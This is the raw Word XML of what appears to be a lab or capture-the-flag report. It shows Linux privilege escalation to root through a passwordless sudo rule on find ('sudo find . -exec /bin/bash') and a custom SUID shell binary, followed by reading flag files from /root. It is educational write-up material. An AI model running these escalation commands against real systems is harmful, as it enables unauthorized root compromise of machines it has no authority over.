            <wp:docPr id="102062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23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D222" w14:textId="31B330B3" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="7BFB456C" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BE4602" w14:textId="4F53CC0C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lastRenderedPageBreak/>
        <w:t>Enumerating Sudo Privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B908488" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The attacker enumerated available sudo permissions for the employee account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32392C06" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565ABB1E" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C95F0A" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
        <w:t>The output confirmed that employee can execute /usr/bin/find as root without a password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554FE71C" w14:textId="722FFF08" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3657CB2C" wp14:editId="7A3959E6">
            <wp:extent cx="5943600" cy="1788160"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="176053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31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0D56" w14:textId="3997B9C7" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBECE7A" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="4DA69939" w14:textId="1060E6AA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t>Exploiting Sudo Find to Gain Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B50F8A7" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The find binary was abused to spawn a root shell using the -exec option.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5FC315" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CBE11C" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>sudo find . -exec /bin/bash \; -quit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887B8E6" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CD4591" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
        <w:t>The attacker successfully escalated privileges to root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12F2A8BD" w14:textId="58DDBE1B" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DD2F157" wp14:editId="75E06834">
            <wp:extent cx="5943600" cy="1786890"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="74688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88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2511" w14:textId="3D0A8874" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="1D96E61E" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="71DABECF" w14:textId="648B7733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lastRenderedPageBreak/>
        <w:t>Capturing the Medium Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD70FE6" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>With root access obtained, the medium difficulty flag was retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2889CF56" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E3D58E" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>cat /root/phase3_medium_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44849515" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D582112" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>FLAG{PHASE3_SUDO_MISCONFIG_ROOT}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F96C3C" w14:textId="10ADBC27" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7417E1AE" wp14:editId="7726BEFF">
            <wp:extent cx="5943600" cy="980440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="130058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7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F239" w14:textId="247A264A" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="275D4B56" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8E1F92" w14:textId="2A81B23F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lastRenderedPageBreak/>
        <w:t>Enumerating SUID Binaries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A5DD39E" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The attacker searched the system for files with the SUID permission bit set.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C3B59" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ACDB534" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>find / -perm -4000 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10AD46A3" w14:textId="356A5A57" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00064B2A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4C18809D" wp14:editId="0E227B39">
            <wp:extent cx="5943600" cy="1864360"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:docPr id="70383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319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9E46" w14:textId="516F6A9C" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="20FAAFBF" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRDefault="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B73D313" w14:textId="095DBA36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lastRenderedPageBreak/>
        <w:t>Identifying the Vulnerable SUID Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65754C1A" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The presence of /usr/local/bin/backup.sh in the SUID list confirmed a potential privilege escalation vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EC00F3" w14:textId="7DAC8092" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00566571">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="299F928D" wp14:editId="3E8B363C">
            <wp:extent cx="5943600" cy="3228340"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="147839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95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1595" w14:textId="218424A6" w:rsidR="00EE6912" w:rsidRDefault="00EE6912">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F2057AA" w14:textId="068F42B5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lastRenderedPageBreak/>
        <w:t>Exploiting the SUID Binary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D0006D" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>The SUID script was executed directly, spawning a root shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AD567A" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command(s):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28DB49FB" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>/usr/local/bin/suid_shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB1FCD8" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>whoami</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3DE26D" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
        <w:t>The attacker obtained root privileges again via SUID exploitation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63246875" w14:textId="54F1D827" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="000C18FB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5CFE41E8" wp14:editId="5DD1BA74">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="127491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13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29D2" w14:textId="74D39701" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="47F9248C" w14:textId="2F827CF3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t>Capturing the Hard Flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFBDEBC" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>With root access via the SUID binary, the hard challenge flag was retrieved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489C9DE6" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6264F6" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>cat /root/phase3_hard_flag.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48C7F421" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39ED69C2" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:t>FLAG{PHASE3_SUID_BINARY_ESCALATION}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FF1429" w14:textId="79B185DF" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Evidence:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:br/>
      </w:r>
      <w:r w:rsidR="00EE6912" w:rsidRPr="000C18FB">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A69B4B9" wp14:editId="6D2A2E34">
            <wp:extent cx="5943600" cy="3327400"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="70046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13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5D2F" w14:textId="063B72B6" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50"/>
    <w:p w14:paraId="07C4AA52" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phase 3 Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC6C1E4" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Medium Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve"> Exploited a sudo misconfiguration allowing passwordless execution of find, resulting in full root compromise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0900D9" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hard Challenge:</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve"> Abused a custom SUID binary executing /bin/bash -p to escalate privileges.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56726770" w14:textId="77777777" w:rsidR="00EB2E50" w:rsidRPr="00EB2E50" w:rsidRDefault="00EB2E50" w:rsidP="00EB2E50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve">Both vulnerabilities demonstrate real-world privilege escalation risks caused by </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>improper sudo rules</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unsafe SUID binaries</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB2E50">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8279B3" w14:textId="77777777" w:rsidR="005B6FE8" w:rsidRDefault="005B6FE8"/>
    <w:sectPr w:rsidR="005B6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C0919"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6C88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23F16"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FBC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650736">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1490750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50"/>
    <w:rsid w:val="005B6FE8"/>
    <w:rsid w:val="009C49D2"/>
    <w:rsid w:val="00EB2E50"/>
    <w:rsid w:val="00EE6912"/>
    <w:rsid w:val="00FE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A6B8"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BC3A5F95-30E0-4141-A140-92610908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MOHAMMED FAROOK MOHAMMED FARAJ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>NOOR MOHAMMED FAROOK MOHAMMED FARAJ</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-01-30T21:41:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-01-30T21:59:00Z</dcterms:modified>
</cp:coreProperties>
</file>